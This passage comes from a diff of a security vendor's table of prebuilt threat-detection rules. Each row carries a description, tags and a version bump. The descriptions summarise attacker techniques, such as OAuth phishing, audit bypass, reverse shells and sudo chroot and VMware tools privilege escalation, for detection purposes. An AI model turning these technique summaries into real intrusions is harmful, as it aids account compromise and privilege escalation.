Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |210 +|<> |Identifies accounts with a high number of single sign-on (SSO) logon errors. Excessive logon errors may indicate an attempt to brute force a password or SSO token. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |211 -|<> |Detects the occurrence of mailbox audit bypass associations. The mailbox audit is responsible for logging specified mailbox events (like accessing a folder or a message or permanently deleting a message). However, actions taken by some authorized accounts, such as accounts used by third-party tools or accounts used for lawful monitoring, can create a large number of mailbox audit log entries and may not be of interest to your organization. Because of this, administrators can create bypass associations, allowing certain accounts to perform their tasks without being logged. Attackers can abuse this allowlist mechanism to conceal actions taken, as the mailbox audit will log no activity done by the account. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Initial Access], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |209 +|<> |Detects the occurrence of mailbox audit bypass associations. The mailbox audit is responsible for logging specified mailbox events (like accessing a folder or a message or permanently deleting a message). However, actions taken by some authorized accounts, such as accounts used by third-party tools or accounts used for lawful monitoring, can create a large number of mailbox audit log entries and may not be of interest to your organization. Because of this, administrators can create bypass associations, allowing certain accounts to perform their tasks without being logged. Attackers can abuse this allowlist mechanism to conceal actions taken, as the mailbox audit will log no activity done by the account. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Initial Access], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Detects a change to the OpenID Connect (OIDC) discovery URL in the Entra ID Authentication Methods Policy. This behavior may indicate an attempt to federate Entra ID with an attacker-controlled identity provider, enabling bypass of multi-factor authentication (MFA) and unauthorized access through bring-your-own IdP (BYOIDP) methods. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |3 +|<> |Detects a change to the OpenID Connect (OIDC) discovery URL in the Entra ID Authentication Methods Policy. This behavior may indicate an attempt to federate Entra ID with an attacker-controlled identity provider, enabling bypass of multi-factor authentication (MFA) and unauthorized access through bring-your-own IdP (BYOIDP) methods. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |4 |<> |Identifies the modification of the Microsoft Office "Office Test" Registry key, a registry location that can be used to specify a DLL which will be executed every time an MS Office application is started. Attackers can abuse this to gain persistence on a compromised host. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Data Source: Sysmon], [Resources: Investigation Guide] |None |107 @@ -1478,9 +1498,9 @@ and their rule type is `machine_learning`. |<> |A user has initiated a session impersonation granting them access to the environment with the permissions of the user they are impersonating. This would likely indicate Okta administrative access and should only ever occur if requested and expected. |[Use Case: Identity and Access Audit], [Tactic: Credential Access], [Data Source: Okta], [Resources: Investigation Guide] |None |414 -|<> |Detects when a specific Okta actor has multiple sessions started from different geolocations. Adversaries may attempt to launch an attack by using a list of known usernames and passwords to gain unauthorized access to user accounts from different locations. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Initial Access], [Resources: Investigation Guide] |None |307 +|<> |Detects when a specific Okta actor has multiple sessions started from different geolocations. Adversaries may attempt to launch an attack by using a list of known usernames and passwords to gain unauthorized access to user accounts from different locations. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Initial Access], [Resources: Investigation Guide] |None |308 -|<> |Identifies the occurence of files uploaded to OneDrive being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunity to gain initial access to other endpoints in the environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Lateral Movement], [Resources: Investigation Guide] |None |209 +|<> |Identifies the occurence of files uploaded to OneDrive being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunity to gain initial access to other endpoints in the environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Lateral Movement], [Resources: Investigation Guide] |None |210 |<> |This rule detects the usage of the `openssl` binary to generate password hashes on Linux systems. The `openssl` command is a cryptographic utility that can be used to generate password hashes. Attackers may use `openssl` to generate password hashes for new user accounts or to change the password of existing accounts, which can be leveraged to maintain persistence on a Linux system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |4 @@ -1552,7 +1572,7 @@ and their rule type is `machine_learning`. |<> |Active Directory Integrated DNS (ADIDNS) is one of the core components of AD DS, leveraging AD's access control and replication to maintain domain consistency. It stores DNS zones as AD objects, a feature that, while robust, introduces some security issues, such as wildcard records, mainly because of the default permission (Any authenticated users) to create DNS-named records. Attackers can create wildcard records to redirect traffic that doesn't explicitly match records contained in the zone, becoming the Man-in-the-Middle and being able to abuse DNS similarly to LLMNR/NBNS spoofing. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Active Directory], [Use Case: Active Directory Monitoring], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |107 -|<> |Identifies potential ransomware note being uploaded to an AWS S3 bucket. This rule detects the `PutObject` S3 API call with a common ransomware note file extension such as `.ransom`, or `.lock`. Adversaries with access to a misconfigured S3 bucket may retrieve, delete, and replace objects with ransom notes to extort victims. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide] |None |6 +|<> |Identifies potential ransomware note being uploaded to an AWS S3 bucket. This rule detects the PutObject S3 API call with a common ransomware note file name or extension such as ransom or .lock. Adversaries with access to a misconfigured S3 bucket may retrieve, delete, and replace objects with ransom notes to extort victims. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide] |None |7 |<> |Detects potential resource exhaustion or data breach attempts by monitoring for users who consistently generate high input token counts, submit numerous requests, and receive large responses. This behavior could indicate an attempt to overload the system or extract an unusually large amount of data, possibly revealing sensitive information or causing service disruptions. |[Domain: LLM], [Data Source: AWS Bedrock], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Use Case: Potential Overload], [Use Case: Resource Exhaustion], [Mitre Atlas: LLM04], [Resources: Investigation Guide] |None |5 @@ -1570,8 +1590,14 @@ and their rule type is `machine_learning`. |<> |Detects potential buffer overflow attacks by querying the "Segfault Detected" pre-built rule signal index, through a threshold rule, with a minimum number of 100 segfault alerts in a short timespan. A large amount of segfaults in a short time interval could indicate application exploitation attempts. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Initial Access], [Use Case: Vulnerability], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide] |None |4 +|<> |Detects suspicious creation of the nsswitch.conf file, outside of the regular /etc/nsswitch.conf path, consistent with attempts to exploit CVE-2025-32463 (the "sudo chroot" privilege escalation), where an attacker tricks sudo into using attacker-controlled NSS files or libraries to gain root. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Data Source: Elastic Endgame], [Data Source: Auditd Manager], [Use Case: Vulnerability], [Resources: Investigation Guide] |None |1 + +|<> |Detects suspicious use of sudo's --chroot / -R option consistent with attempts to exploit CVE-2025-32463 (the "sudo chroot" privilege escalation), where an attacker tricks sudo into using attacker-controlled NSS files or libraries to gain root. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Data Source: Elastic Endgame], [Data Source: Auditd Manager], [Use Case: Vulnerability], [Resources: Investigation Guide] |None |1 + |<> |Identifies a suspicious Diagnostics Utility for Internet Explorer child process. This may indicate the successful exploitation of the vulnerability CVE-2025-33053. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |1 +|<> |This rule looks for processes that behave like an attacker trying to exploit a known vulnerability in VMware tools (CVE-2025-41244). The vulnerable behavior involves the VMware tools service or its discovery scripts executing other programs to probe their version strings. An attacker can place a malicious program in a writable location (for example /tmp) and have the tools execute it with elevated privileges, resulting in local privilege escalation. The rule flags launches where vmtoolsd or the service discovery scripts start other child processes. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Data Source: Elastic Endgame], [Data Source: Auditd Manager], [Use Case: Vulnerability], [Resources: Investigation Guide] |None |1 + |<> |Monitors for the execution of a file system mount followed by a chroot execution. Given enough permissions, a user within a container is capable of mounting the root file system of the host, and leveraging chroot to escape its containarized environment. This behavior pattern is very uncommon and should be investigated. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Domain: Container], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |106 |<> |This rule monitors for suspicious activities that may indicate an attacker attempting to execute arbitrary code within a PostgreSQL environment. Attackers can execute code via PostgreSQL as a result of gaining unauthorized access to a public facing PostgreSQL database or exploiting vulnerabilities, such as remote command execution and SQL injection attacks, which can result in unauthorized access and malicious actions, and facilitate post-exploitation activities for unauthorized access and malicious actions. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |11 @@ -1772,7 +1798,7 @@ and their rule type is `machine_learning`. |<> |Identifies port monitor and print processor registry modifications. Adversaries may abuse port monitor and print processors to run malicious DLLs during system boot that will be executed as SYSTEM for privilege escalation and/or persistence, if permissions allow writing a fully-qualified pathname for that DLL. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Microsoft Defender for Endpoint], [Resources: Investigation Guide] |None |111 -|<> |This rule detects potential port scanning activity from a compromised host. Port scanning is a common reconnaissance technique used by attackers to identify open ports and services on a target system. A compromised host may exhibit port scanning behavior when an attacker is attempting to map out the network topology, identify vulnerable services, or prepare for further exploitation. This rule identifies potential port scanning activity by monitoring network connection attempts from a single host to a large number of ports within a short time frame. ESQL rules have limited fields available in its alert documents. Make sure to review the original documents to aid in the investigation of this alert. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |6 +|<> |This rule detects potential port scanning activity from a compromised host. Port scanning is a common reconnaissance technique used by attackers to identify open ports and services on a target system. A compromised host may exhibit port scanning behavior when an attacker is attempting to map out the network topology, identify vulnerable services, or prepare for further exploitation. This rule identifies potential port scanning activity by monitoring network connection attempts from a single host to a large number of ports within a short time frame. ESQL rules have limited fields available in its alert documents. Make sure to review the original documents to aid in the investigation of this alert. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |7 |<> |Detects known PowerShell offensive tooling author's name in PowerShell scripts. Attackers commonly use out-of-the-box offensive tools without modifying the code, which may still contain the author artifacts. This rule identifies common author handles found in popular PowerShell scripts used for red team exercises. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: PowerShell Logs], [Resources: Investigation Guide] |None |108 @@ -1850,7 +1876,7 @@ and their rule type is `machine_learning`. |<> |Identifies known execution traces of the REMCOS Remote Access Trojan. Remcos RAT is used by attackers to perform actions on infected machines remotely. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Windows Security Event Logs] |None |1 -|<> |This rule identifies a high number (20) of file creation event by the System virtual process from the same host and with same file name containing keywords similar to ransomware note files and all within a short time period. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne] |None |210 +|<> |This rule identifies the creation of multiple files with same name and over SMB by the same user. This behavior may indicate the successful remote execution of a ransomware dropping file notes to different folders. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |211 |<> |Identifies an incoming SMB connection followed by the creation of a file with a name similar to ransomware note files. This may indicate a remote ransomware attack via the SMB protocol. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |6 @@ -1866,7 +1892,7 @@ and their rule type is `machine_learning`. |<> |Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers for initial access and delivery of malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |1 -|<> |Identifies attempt to perform session hijack via COM object registry modification by setting the RunAs value to Interactive User. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Data Source: Sysmon], [Resources: Investigation Guide] |None |3 +|<> |Identifies attempt to perform session hijack via COM object registry modification by setting the RunAs value to Interactive User. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Data Source: Sysmon], [Resources: Investigation Guide] |None |4 |<> |This detection rule identifies suspicious network traffic patterns associated with TCP reverse shell activity. This activity consists of a parent-child relationship where a network event is followed by the creation of a shell process. An attacker may establish a Linux TCP reverse shell to gain remote access to a target system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |13 @@ -2250,7 +2276,7 @@ and their rule type is `machine_learning`. |<> |This rule monitors for Linux Shadow file modifications. These modifications are indicative of a potential password change or user addition event. Threat actors may attempt to create new users or change the password of a user account to maintain access to a system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |5 -|<> |Identifies the occurence of files uploaded to SharePoint being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Lateral Movement], [Resources: Investigation Guide] |None |209 +|<> |Identifies the occurence of files uploaded to SharePoint being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Lateral Movement], [Resources: Investigation Guide] |None |210 |<> |This rule monitors the creation of shared object files by previously unknown processes. The creation of a shared object file involves compiling code into a dynamically linked library that can be loaded by other programs at runtime. While this process is typically used for legitimate purposes, malicious actors can leverage shared object files to execute unauthorized code, inject malicious functionality into legitimate processes, or bypass security controls. This allows malware to persist on the system, evade detection, and potentially compromise the integrity and confidentiality of the affected system and its data. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |13 @@ -2324,7 +2350,7 @@ and their rule type is `machine_learning`. |<> |Identifies files written to or modified in the startup folder by commonly abused processes. Adversaries may use this technique to maintain persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne] |None |314 -|<> |Identifies run key or startup key registry modifications. In order to survive reboots and other system interrupts, attackers will modify run keys within the registry or leverage startup folder items as a form of persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |None |117 +|<> |Identifies run key or startup key registry modifications. In order to survive reboots and other system interrupts, attackers will modify run keys within the registry or leverage startup folder items as a form of persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |None |118 |<> |Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring], [Data Source: Windows Security Event Logs] |None |214 @@ -2398,7 +2424,7 @@ and their rule type is `machine_learning`. |<> |A suspicious Endpoint Security parent process was detected. This may indicate a process hollowing or other form of code injection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |319 -|<> |Identifies rare occurrences of OAuth workflow for a user principal that is single factor authenticated, with an OAuth scope containing user_impersonation for a token issued by Entra ID. Adversaries may use this scope to gain unauthorized access to user accounts, particularly when the sign-in session status is unbound, indicating that the session is not associated with a specific device or session. This behavior is indicative of potential account compromise or unauthorized access attempts. This rule flags when this pattern is detected for a user principal that has not been seen in the last 10 days, indicating potential abuse or unusual activity. |[Domain: Cloud], [Domain: Identity], [Use Case: Threat Detection], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-In Logs], [Tactic: Defense Evasion], [Tactic: Initial Access], [Resources: Investigation Guide] |None |1 +|<> |Identifies rare occurrences of OAuth workflow for a user principal that is single factor authenticated, with an OAuth scope containing user_impersonation for a token issued by Entra ID. Adversaries may use this scope to gain unauthorized access to user accounts, particularly when the sign-in session status is unbound, indicating that the session is not associated with a specific device or session. This behavior is indicative of potential account compromise or unauthorized access attempts. This rule flags when this pattern is detected for a user principal that has not been seen in the last 10 days, indicating potential abuse or unusual activity. |[Domain: Cloud], [Domain: Identity], [Use Case: Threat Detection], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-In Logs], [Tactic: Initial Access], [Resources: Investigation Guide] |None |2 |<> |This detection rule addresses multiple vulnerabilities in the CUPS printing system, including CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177. Specifically, this rule detects suspicious process command lines executed by child processes of foomatic-rip and cupsd. These flaws impact components like cups-browsed, libcupsfilters, libppd, and foomatic-rip, allowing remote unauthenticated attackers to manipulate IPP URLs or inject malicious data through crafted UDP packets or network spoofing. This can result in arbitrary command execution when a print job is initiated. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Use Case: Vulnerability], [Tactic: Execution], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |106 @@ -2460,7 +2486,7 @@ and their rule type is `machine_learning`. |<> |Identifies suspicious Microsoft 365 mail access by ClientAppId. This rule detects when a user accesses their mailbox using a client application that is not typically used by the user, which may indicate potential compromise or unauthorized access attempts. Adversaries may use custom or third-party applications to access mailboxes, bypassing standard security controls. First-party Microsoft applications are also abused after OAuth tokens are compromised, allowing adversaries to access mailboxes without raising suspicion. |[Domain: Cloud], [Domain: Email], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide] |None |111 -|<> |Identifies sign-ins on behalf of a principal user to the Microsoft Graph API from multiple IPs using the Microsoft Authentication Broker or Visual Studio Code application. This behavior may indicate an adversary using a phished OAuth refresh token. |[Domain: Cloud], [Domain: Email], [Domain: Identity], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Resources: Investigation Guide], [Tactic: Defense Evasion] |None |3 +|<> |Identifies sign-ins on behalf of a principal user to the Microsoft Graph API from multiple IPs using the Microsoft Authentication Broker or Visual Studio Code application. This behavior may indicate an adversary using a phished OAuth refresh token. |[Domain: Cloud], [Domain: Email], [Domain: Identity], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Resources: Investigation Guide], [Tactic: Defense Evasion] |None |4 |<> |Identifies suspicious execution of the Microsoft Antimalware Service Executable (MsMpEng.exe) from non-standard paths or renamed instances. This may indicate an attempt to evade defenses through DLL side-loading or by masquerading as the antimalware process. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Tactic: Execution], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |216 @@ -2468,7 +2494,7 @@ and their rule type is `machine_learning`. |<> |Identifies Mshta.exe spawning a suspicious child process. This may indicate adversarial activity, as Mshta is often leveraged by adversaries to execute malicious scripts and evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |1 -|<> |Identifies separate OAuth authorization flows in Microsoft Entra ID where the same user principal and session ID are observed across multiple IP addresses within a 5-minute window. These flows involve the Microsoft Authentication Broker (MAB) as the client application and the Device Registration Service (DRS) as the target resource. This pattern is highly indicative of OAuth phishing activity, where an adversary crafts a legitimate Microsoft login URL to trick a user into completing authentication and sharing the resulting authorization code, which is then exchanged for an access and refresh token by the attacker. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Resources: Investigation Guide], [Tactic: Initial Access] |None |3 +|<> |Identifies separate OAuth authorization flows in Microsoft Entra ID where the same user principal and session ID are observed across multiple IP addresses within a 5-minute window. These flows involve the Microsoft Authentication Broker (MAB) as the client application and the Device Registration Service (DRS) as the target resource. This pattern is highly indicative of OAuth phishing activity, where an adversary crafts a legitimate Microsoft login URL to trick a user into completing authentication and sharing the resulting authorization code, which is then exchanged for an access and refresh token by the attacker. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Resources: Investigation Guide], [Tactic: Initial Access] |None |4 |<> |Identifies service creation events of common mining services, possibly indicating the infection of a system with a cryptominer. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |110 @@ -2490,13 +2516,13 @@ and their rule type is `machine_learning`. |<> |Monitors for the generation of a passwd password entry via openssl, followed by a file write activity on the "/etc/passwd" file. The "/etc/passwd" file in Linux stores user account information, including usernames, user IDs, group IDs, home directories, and default shell paths. Attackers may exploit a misconfiguration in the "/etc/passwd" file permissions or other privileges to add a new entry to the "/etc/passwd" file with root permissions, and leverage this new user account to login as root. |[Data Source: Auditd Manager], [Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |7 -|<> |This rule detects the execution of a PATH variable in a command line invocation by a shell process. This behavior is unusual and may indicate an attempt to execute a command from a non-standard location. This technique may be used to evade detection or perform unauthorized actions on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |4 +|<> |This rule detects the execution of a PATH variable in a command line invocation by a shell process. This behavior is unusual and may indicate an attempt to execute a command from a non-standard location. This technique may be used to evade detection or perform unauthorized actions on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |5 |<> |This rule detects suspicious paths mounted on Linux systems. The mount command is used to attach filesystems to the system, and attackers may use it to mount malicious filesystems or directories for data exfiltration or persistence. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |2 |<> |Detects the presence of a portable executable (PE) in a PowerShell script by looking for its encoded header. Attackers embed PEs into PowerShell scripts to inject them into memory, avoiding defences by not writing to disk. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |None |215 -|<> |Identifies the PowerShell engine being invoked by unexpected processes. Rather than executing PowerShell functionality with powershell.exe, some attackers do this to operate more stealthily. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |213 +|<> |Identifies the PowerShell engine being invoked by unexpected processes. Rather than executing PowerShell functionality with powershell.exe, some attackers do this to operate more stealthily. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |214 |<> |A machine learning job detected a PowerShell script with unusual data characteristics, such as obfuscation, that may be a characteristic of malicious PowerShell script text blocks. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Execution], [Resources: Investigation Guide] |None |210 @@ -2528,6 +2554,8 @@ and their rule type is `machine_learning`. |<> |Identifies scrobj.dll loaded into unusual Microsoft processes. This usually means a malicious scriptlet is being executed in the target process. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Sysmon], [Resources: Investigation Guide] |None |212 +|<> |Identifies attempts to use the SeIncreaseBasePriorityPrivilege privilege by an unusual process. This could be related to hijack execution flow of a process via threats priority manipulation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |1 + |<> |Identifies the creation of a new Windows service with suspicious Service command values. Windows services typically run as SYSTEM and can be used for privilege escalation and persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs], [Data Source: Windows System Event Logs] |None |114 |<> |A suspicious SolarWinds child process was detected, which may indicate an attempt to execute malicious programs. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |213 @@ -2560,7 +2588,7 @@ and their rule type is `machine_learning`. |<> |Identifies the execution of the Windows Command Shell process (cmd.exe) with suspicious argument values. This behavior is often observed during malware installation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Elastic Endgame], [Data Source: Crowdstrike] |None |206 -|<> |Identifies the execution of PowerShell with suspicious argument values. This behavior is often observed during malware installation leveraging PowerShell. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Windows Security Event Logs], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Crowdstrike], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |208 +|<> |Identifies the execution of 